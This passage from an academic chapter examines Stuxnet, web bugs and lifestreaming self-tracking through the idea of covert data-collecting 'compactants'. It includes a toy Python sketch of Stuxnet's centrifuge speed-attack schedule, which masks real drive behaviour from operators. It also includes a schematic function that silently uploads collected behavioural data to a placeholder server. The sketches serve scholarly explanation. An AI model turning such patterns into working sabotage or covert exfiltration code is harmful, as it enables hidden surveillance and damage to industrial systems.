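# (frequency in Hz, duration in seconds), following Zetter (2011) &lt;br /&gt;
ATTACK_PLAN = [ &lt;br /&gt;
    (1410, 15 * 60),            # overspeed, near the rotor's mechanical limit &lt;br /&gt;
    (NOMINAL, 27 * 24 * 3600),  # 27 quiet days of apparently normal running &lt;br /&gt;
    (2, 50 * 60),               # underspeed, disrupting the enrichment process &lt;br /&gt;
    (NOMINAL, 27 * 24 * 3600),  # another 27 quiet days, then repeat &lt;br /&gt;
] &lt;br /&gt;
 &lt;br /&gt;
def run(set_frequency, report_to_operators, cycles=1): &lt;br /&gt;
    for _ in range(cycles): &lt;br /&gt;
        for hz, seconds in ATTACK_PLAN: &lt;br /&gt;
            set_frequency(hz) &lt;br /&gt;
            # The man-in-the-middle element: whatever the drives are &lt;br /&gt;
            # really doing, the control room is shown nominal readings. &lt;br /&gt;
            report_to_operators(NOMINAL) &lt;br /&gt;
            sleep(seconds) &lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Even in this toy form, the two design decisions that made Stuxnet so hard to detect are visible: the damage is spread across week-long intervals so that failures look like fatigue, and the reporting channel is decoupled from the physical process. &lt;br /&gt;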
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have needed to work on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, one using a set of techniques that are neither public nor known to the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software-based markers that give away the physical identity of the location. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of the rotors, leading to cracks and failures, and the second, larger warhead, 417, manipulated valves in the centrifuges and faked industrial process control sensor signals by modeling the centrifuges, which were grouped into cascades of 164 (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This [Eds: what does 'this' here refer to? Can it be clarified so this sentences reads better] was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to “Myrtus” was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan -&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized against targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild, it is relatively trivial to decode it and, in a very short time, learn techniques that would otherwise have taken many years of development. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of data on industrial control systems and structures: a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports, &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The increased ability of software and code, via computational devices, to covertly monitor, control and mediate, both positively and negatively, is not just a matter of interventions designed to deceive the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems, as part of the notion of lifestreams and, more particularly, the quantified self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to connect these developments in web bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have spread in recent years as ‘real-time stream’ platforms, like Twitter and Facebook, have expanded. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This phenomenon of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc., is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Gelernter originally described these as ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions in relation to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter with its text-message-sized 140-character updates. Nonetheless, this is still enough text space to incorporate a surprising amount of data, particularly when geodata, images, weblinks and so forth are factored in. Stephen Wolfram was one of the first people to collect his own data systematically, beginning with email in 1989. As he explains: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that. Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &lt;br /&gt;
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and, in the context of reflexivity and self-knowledge, it raises interesting questions. The data collected can also be relatively large in scale and unstructured. Nonetheless, better data management and better techniques for searching and surfacing information from unstructured or semi-structured data will no doubt prove revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' – small, relatively contained applications that usually perform a single specific function – have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also to search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that are common in smartphones, to log GPS location, direction and so forth. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard that is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams, n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
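For illustration, an activity of the kind quoted above might be encoded along the following lines. This is a sketch, in Python, of the actor/verb/object/target shape from the JSON Activity Streams 1.0 specification (ActivityStreamsWG, 2011); the ids, URL and values are invented for the example. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
import json

# 'Geraldine posted a photo to her album', encoded as an activity;
# the ids and values below are invented for illustration
activity = {
    'published': '2011-02-10T15:04:55Z',
    'actor': {'objectType': 'person', 'id': 'urn:example:geraldine',
              'displayName': 'Geraldine'},
    'verb': 'post',
    'object': {'objectType': 'photo', 'id': 'urn:example:photo:1',
               'url': 'http://example.org/geraldine/photo/1'},
    'target': {'objectType': 'photo-album', 'displayName': 'Holiday album'},
}

# serialised so it can be transmitted, aggregated, searched and processed
print(json.dumps(activity, indent=2))
&amp;lt;/pre&amp;gt; &lt;br /&gt;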
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques, such as heat-maps and graph theory, that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and the aggregative use case – in other words, for the individual user (or lifestreamer) or the organization (such as Facebook) – the key is to pattern-match and compare details of the data, such as against a norm, a historical data set, or a population, group or class of others.[13] &lt;br /&gt;
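&lt;br /&gt;
As a toy illustration of this pattern-matching against a norm, consider comparing today’s value with a personal historical baseline; a minimal sketch in Python, where the step counts and the statistical treatment are invented for the example. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
from statistics import mean, stdev

# compare today against the personal norm; all numbers invented
history = [6200, 5400, 7100, 5900, 6800, 6400, 7000]   # daily step counts
today = 3100

baseline = mean(history)
deviation = (today - baseline) / stdev(history)
print('today is %.1f standard deviations from the personal norm' % deviation)
&amp;lt;/pre&amp;gt; &lt;br /&gt;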
&lt;br /&gt;
The patterned usage is therefore a dynamic real-time feedback mechanism, both in terms of providing steers for behaviour, norms and so forth, and in offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally amounts to the construction of a hierarchical social structure within the group of users. It also encourages users to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational care of the self, facilitated by an army of oligopticons (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining meaning and narratives through the stabilisation of a web of meaning for the actor.[14] &lt;br /&gt;
&lt;br /&gt;
I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed very productive knowledge can be generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand software ecologies such as these (Berry, 2011). &lt;br /&gt;
&lt;br /&gt;
One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, create the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time, whilst secreting themselves within our computer systems, raises important questions. However, users are actively downloading apps that advertise the fact that they collect this data, and seem genuinely to find an existential relief or recognition in their movements being recorded and made available for later playback or analysis. Web bugs, in many ways, are life streams – albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' is designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want particularly to draw attention to this passive-aggressive feature of computational agents that collect information: they are passive in quality – under the surface, relatively benign and silent – but aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and of compactness as conciseness in expression. The etymology, from the Latin ''compactus'', closely put together or joined, also neatly expresses the sense of what web bugs and related technologies are. Compactants are also useful in terms of the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that are often generated, the computational processing and aggregation is often offloaded to the ‘cloud’ – server computers designed specifically for the task and accessed via networks. Indeed, many viruses often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs. &lt;br /&gt;
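&lt;br /&gt;
This dichotomous structure can be sketched schematically: silent local collection in one mode, and a periodic ‘call home’ to the cloud for aggregation in the other. In the following Python sketch the endpoint URL and the payload fields are hypothetical, for illustration only. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
import json
import time
import urllib.request

INGEST_URL = 'http://example.org/ingest'   # hypothetical aggregation server
buffer = []

def observe(signal):
    # passive mode: silently append behavioural signals with a timestamp
    buffer.append({'t': time.time(), 'signal': signal})

def call_home():
    # aggressive mode: upload the hoard of data for server-side processing;
    # the response could equally carry updates or new configuration
    data = json.dumps(buffer).encode('utf-8')
    req = urllib.request.Request(INGEST_URL, data=data,
                                 headers={'Content-Type': 'application/json'})
    urllib.request.urlopen(req)
    buffer.clear()
&amp;lt;/pre&amp;gt; &lt;br /&gt;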
&lt;br /&gt;
We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the ‘future self’ will be required to undo the bad habits and behaviours of the present self. That is, there is an explicit normative orientation towards a ''future'' self, whom you, as the ''present'' self, may be treating unfairly, immorally or without due regard – what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal representation of time within computational systems, that is, time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
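&lt;br /&gt;
In code, this futural orientation can be as simple as a projection object that is recomputed whenever a new observation arrives; a schematic Python sketch, in which the naive linear extrapolation stands in for the far more sophisticated models used in, say, weather prediction. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# the future held as a code-object, recomputed in real time
class Projection:
    def __init__(self):
        self.past = []          # stored data: the past
        self.forecast = None    # the future, as an updatable object

    def update(self, value):
        self.past.append(value)             # the present becomes the past
        if len(self.past) == 1:
            self.forecast = value
        else:
            trend = self.past[-1] - self.past[-2]
            self.forecast = self.past[-1] + trend

stream = Projection()
for reading in [10.0, 10.4, 10.9, 11.1]:
    stream.update(reading)
print('projected next reading:', stream.forecast)
&amp;lt;/pre&amp;gt; &lt;br /&gt;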
&lt;br /&gt;
There are many examples of how attending to the code and software that structure many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights, both into our usage of code and software and into the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not been fully incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and that its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy: the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities, we are still developing our understanding. But this should give hope and direction to critical theorists, both of the present, looking to provide critique and counterfactuals, and ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0, Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume 6, Number 1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture Desire, ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress, accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) The cyber-road not taken, ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012, http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
